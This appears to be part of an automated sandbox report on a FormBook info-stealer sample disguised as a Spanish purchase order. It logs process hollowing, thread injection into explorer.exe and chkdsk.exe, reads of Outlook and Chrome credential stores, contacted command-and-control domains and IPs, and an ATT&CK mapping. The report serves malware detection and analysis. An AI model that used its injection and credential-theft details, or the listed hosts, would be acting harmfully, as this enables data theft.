          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013C76E2 mov eax, dword ptr fs:[00000030h]1_2_013C76E2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_014346A7 mov eax, dword ptr fs:[00000030h]1_2_014346A7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01480EA5 mov eax, dword ptr fs:[00000030h]1_2_01480EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01480EA5 mov eax, dword ptr fs:[00000030h]1_2_01480EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_01480EA5 mov eax, dword ptr fs:[00000030h]1_2_01480EA5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013E36CC mov eax, dword ptr fs:[00000030h]1_2_013E36CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_013F8EC7 mov eax, dword ptr fs:[00000030h]1_2_013F8EC7
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055B7D50 mov eax, dword ptr fs:[00000030h]3_2_055B7D50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055D3D43 mov eax, dword ptr fs:[00000030h]3_2_055D3D43
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05613540 mov eax, dword ptr fs:[00000030h]3_2_05613540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05643D40 mov eax, dword ptr fs:[00000030h]3_2_05643D40
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BC577 mov eax, dword ptr fs:[00000030h]3_2_055BC577
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BC577 mov eax, dword ptr fs:[00000030h]3_2_055BC577
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05668D34 mov eax, dword ptr fs:[00000030h]3_2_05668D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0561A537 mov eax, dword ptr fs:[00000030h]3_2_0561A537
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0565E539 mov eax, dword ptr fs:[00000030h]3_2_0565E539
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055C4D3B mov eax, dword ptr fs:[00000030h]3_2_055C4D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055C4D3B mov eax, dword ptr fs:[00000030h]3_2_055C4D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055C4D3B mov eax, dword ptr fs:[00000030h]3_2_055C4D3B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0559AD30 mov eax, dword ptr fs:[00000030h]3_2_0559AD30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055A3D34 mov eax, dword ptr fs:[00000030h]3_2_055A3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055A3D34 mov eax, dword ptr fs:[00000030h]3_2_055A3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055A3D34 mov eax, dword ptr fs:[00000030h]3_2_055A3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055A3D34 mov eax, dword ptr fs:[00000030h]3_2_055A3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055A3D34 mov eax, dword ptr fs:[00000030h]3_2_055A3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055A3D34 mov eax, dword ptr fs:[00000030h]3_2_055A3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055A3D34 mov eax, dword ptr fs:[00000030h]3_2_055A3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055A3D34 mov eax, dword ptr fs:[00000030h]3_2_055A3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055A3D34 mov eax, dword ptr fs:[00000030h]3_2_055A3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055A3D34 mov eax, dword ptr fs:[00000030h]3_2_055A3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055A3D34 mov eax, dword ptr fs:[00000030h]3_2_055A3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055A3D34 mov eax, dword ptr fs:[00000030h]3_2_055A3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055A3D34 mov eax, dword ptr fs:[00000030h]3_2_055A3D34
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0565FDE2 mov eax, dword ptr fs:[00000030h]3_2_0565FDE2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0565FDE2 mov eax, dword ptr fs:[00000030h]3_2_0565FDE2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0565FDE2 mov eax, dword ptr fs:[00000030h]3_2_0565FDE2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0565FDE2 mov eax, dword ptr fs:[00000030h]3_2_0565FDE2
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05648DF1 mov eax, dword ptr fs:[00000030h]3_2_05648DF1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05616DC9 mov eax, dword ptr fs:[00000030h]3_2_05616DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05616DC9 mov eax, dword ptr fs:[00000030h]3_2_05616DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05616DC9 mov eax, dword ptr fs:[00000030h]3_2_05616DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05616DC9 mov ecx, dword ptr fs:[00000030h]3_2_05616DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05616DC9 mov eax, dword ptr fs:[00000030h]3_2_05616DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05616DC9 mov eax, dword ptr fs:[00000030h]3_2_05616DC9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055AD5E0 mov eax, dword ptr fs:[00000030h]3_2_055AD5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055AD5E0 mov eax, dword ptr fs:[00000030h]3_2_055AD5E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CFD9B mov eax, dword ptr fs:[00000030h]3_2_055CFD9B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CFD9B mov eax, dword ptr fs:[00000030h]3_2_055CFD9B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_056605AC mov eax, dword ptr fs:[00000030h]3_2_056605AC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_056605AC mov eax, dword ptr fs:[00000030h]3_2_056605AC
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05592D8A mov eax, dword ptr fs:[00000030h]3_2_05592D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05592D8A mov eax, dword ptr fs:[00000030h]3_2_05592D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05592D8A mov eax, dword ptr fs:[00000030h]3_2_05592D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05592D8A mov eax, dword ptr fs:[00000030h]3_2_05592D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05592D8A mov eax, dword ptr fs:[00000030h]3_2_05592D8A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055C2581 mov eax, dword ptr fs:[00000030h]3_2_055C2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055C2581 mov eax, dword ptr fs:[00000030h]3_2_055C2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055C2581 mov eax, dword ptr fs:[00000030h]3_2_055C2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055C2581 mov eax, dword ptr fs:[00000030h]3_2_055C2581
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05652D82 mov eax, dword ptr fs:[00000030h]3_2_05652D82
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05652D82 mov eax, dword ptr fs:[00000030h]3_2_05652D82
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05652D82 mov eax, dword ptr fs:[00000030h]3_2_05652D82
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05652D82 mov eax, dword ptr fs:[00000030h]3_2_05652D82
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05652D82 mov eax, dword ptr fs:[00000030h]3_2_05652D82
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05652D82 mov eax, dword ptr fs:[00000030h]3_2_05652D82
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05652D82 mov eax, dword ptr fs:[00000030h]3_2_05652D82
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055C1DB5 mov eax, dword ptr fs:[00000030h]3_2_055C1DB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055C1DB5 mov eax, dword ptr fs:[00000030h]3_2_055C1DB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055C1DB5 mov eax, dword ptr fs:[00000030h]3_2_055C1DB5
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055C35A1 mov eax, dword ptr fs:[00000030h]3_2_055C35A1
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CA44B mov eax, dword ptr fs:[00000030h]3_2_055CA44B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CAC7B mov eax, dword ptr fs:[00000030h]3_2_055CAC7B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CAC7B mov eax, dword ptr fs:[00000030h]3_2_055CAC7B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CAC7B mov eax, dword ptr fs:[00000030h]3_2_055CAC7B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CAC7B mov eax, dword ptr fs:[00000030h]3_2_055CAC7B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CAC7B mov eax, dword ptr fs:[00000030h]3_2_055CAC7B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CAC7B mov eax, dword ptr fs:[00000030h]3_2_055CAC7B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CAC7B mov eax, dword ptr fs:[00000030h]3_2_055CAC7B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CAC7B mov eax, dword ptr fs:[00000030h]3_2_055CAC7B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CAC7B mov eax, dword ptr fs:[00000030h]3_2_055CAC7B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CAC7B mov eax, dword ptr fs:[00000030h]3_2_055CAC7B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055CAC7B mov eax, dword ptr fs:[00000030h]3_2_055CAC7B
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BB477 mov eax, dword ptr fs:[00000030h]3_2_055BB477
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BB477 mov eax, dword ptr fs:[00000030h]3_2_055BB477
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BB477 mov eax, dword ptr fs:[00000030h]3_2_055BB477
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BB477 mov eax, dword ptr fs:[00000030h]3_2_055BB477
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BB477 mov eax, dword ptr fs:[00000030h]3_2_055BB477
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BB477 mov eax, dword ptr fs:[00000030h]3_2_055BB477
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BB477 mov eax, dword ptr fs:[00000030h]3_2_055BB477
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BB477 mov eax, dword ptr fs:[00000030h]3_2_055BB477
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BB477 mov eax, dword ptr fs:[00000030h]3_2_055BB477
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BB477 mov eax, dword ptr fs:[00000030h]3_2_055BB477
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BB477 mov eax, dword ptr fs:[00000030h]3_2_055BB477
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055BB477 mov eax, dword ptr fs:[00000030h]3_2_055BB477
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0562C450 mov eax, dword ptr fs:[00000030h]3_2_0562C450
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0562C450 mov eax, dword ptr fs:[00000030h]3_2_0562C450
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_055B746D mov eax, dword ptr fs:[00000030h]3_2_055B746D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05651C06 mov eax, dword ptr fs:[00000030h]3_2_05651C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05651C06 mov eax, dword ptr fs:[00000030h]3_2_05651C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05651C06 mov eax, dword ptr fs:[00000030h]3_2_05651C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05651C06 mov eax, dword ptr fs:[00000030h]3_2_05651C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05651C06 mov eax, dword ptr fs:[00000030h]3_2_05651C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05651C06 mov eax, dword ptr fs:[00000030h]3_2_05651C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05651C06 mov eax, dword ptr fs:[00000030h]3_2_05651C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05651C06 mov eax, dword ptr fs:[00000030h]3_2_05651C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05651C06 mov eax, dword ptr fs:[00000030h]3_2_05651C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05651C06 mov eax, dword ptr fs:[00000030h]3_2_05651C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05651C06 mov eax, dword ptr fs:[00000030h]3_2_05651C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05651C06 mov eax, dword ptr fs:[00000030h]3_2_05651C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05651C06 mov eax, dword ptr fs:[00000030h]3_2_05651C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_05651C06 mov eax, dword ptr fs:[00000030h]3_2_05651C06
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0566740D mov eax, dword ptr fs:[00000030h]3_2_0566740D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0566740D mov eax, dword ptr fs:[00000030h]3_2_0566740D
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 3_2_0566740D mov eax, dword ptr fs:[00000030h]3_2_0566740D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 1_2_0040CED3 LdrLoadDll,1_2_0040CED3
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 148.251.13.126 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.158 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.treebarktees.com
          Source: C:\Windows\explorer.exeDomain query: www.heroclassicrally.co.uk
          Source: C:\Windows\explorer.exeDomain query: www.hotelyeah.top
          Source: C:\Windows\explorer.exeDomain query: www.jewelryimpact.com
          Source: C:\Windows\explorer.exeDomain query: www.frogair.online
          Source: C:\Windows\explorer.exeDomain query: www.krankenzusatz.net
          Source: C:\Windows\explorer.exeDomain query: www.specigain.online
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.22.198 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.240.117 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.72 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.177.54 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tobinrasheedja.cyou
          Source: C:\Windows\explorer.exeDomain query: www.gachthe365.site
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.148 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.nativealternatives.com
          Source: C:\Windows\explorer.exeNetwork Connect: 81.17.29.149 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 75.102.22.168 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.verde-amar.info
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: B60000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: DEF008Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 protect: page execute and read and writeJump to behavior
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread register set: target process: 3528Jump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3528Jump to behavior
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Caspol.exeJump to behavior
          Source: explorer.exe, 00000002.00000000.320277465.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.572782765.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
          Source: explorer.exe, 00000002.00000000.329267698.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.566402275.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.320277465.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.320277465.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.572782765.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.572168102.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.319764570.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
          Source: explorer.exe, 00000002.00000000.320277465.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.572782765.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Requisito de pedido #23022300.exeQueries volume information: C:\Users\user\Desktop\Requisito de pedido #23022300.exe VolumeInformationJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.572229101.00000000050F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.572833067.0000000005230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.354239146.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\chkdsk.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.571893716.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.572229101.00000000050F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.353994530.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.572833067.0000000005230000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.354239146.00000000012D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Shared Modules          		Path Interception812
          Process Injection          		1
          Masquerading          		1
          OS Credential Dumping          		21
          Security Software Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
          Disable or Modify Tools          		LSASS Memory2
          Process Discovery          		Remote Desktop Protocol1
          Archive Collected Data          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)31
          Virtualization/Sandbox Evasion          		Security Account Manager31
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Data from Local System          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)812
          Process Injection          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer14
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Remote System Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common4
          Obfuscated Files or Information          		Cached Domain Credentials1
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items3
          Software Packing          		DCSync12
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
          Timestomp          		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 814048 Sample: Requisito de pedido #23022300.exe Startdate: 23/02/2023 Architecture: WINDOWS Score: 100 31 www.awc.icu 2->31 35 Snort IDS alert for network traffic 2->35 37 Malicious sample detected (through community Yara rule) 2->37 39 Antivirus detection for URL or domain 2->39 41 3 other signatures 2->41 9 Requisito de pedido #23022300.exe 1 2->9         started        signatures3 process4 file5 23 C:\...\Requisito de pedido #23022300.exe.log, CSV 9->23 dropped 51 Writes to foreign memory regions 9->51 53 Allocates memory in foreign processes 9->53 55 Injects a PE file into a foreign processes 9->55 13 CasPol.exe 9->13         started        signatures6 process7 signatures8 57 Modifies the context of a thread in another process (thread injection) 13->57 59 Maps a DLL or memory area into another process 13->59 61 Sample uses process hollowing technique 13->61 63 Queues an APC in another process (thread injection) 13->63 16 explorer.exe 1 1 13->16 injected process9 dnsIp10 25 www.verde-amar.info 185.53.177.54, 49695, 80 TEAMINTERNET-ASDE Germany 16->25 27 krankenzusatz.net 81.169.145.158, 49704, 49705, 80 STRATOSTRATOAGDE Germany 16->27 29 13 other IPs or domains 16->29 33 System process connects to network (likely due to code injection or exploit) 16->33 20 chkdsk.exe 13 16->20         started        signatures11 process12 signatures13 43 Tries to steal Mail credentials (via file / registry access) 20->43 45 Tries to harvest and steal browser information (history, passwords, etc) 20->45 47 Modifies the context of a thread in another process (thread injection) 20->47 49 Maps a DLL or memory area into another process 20->49

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Requisito de pedido #23022300.exe15%ReversingLabsByteCode-MSIL.Trojan.Pwsx
          Requisito de pedido #23022300.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.CasPol.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          krankenzusatz.net4%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
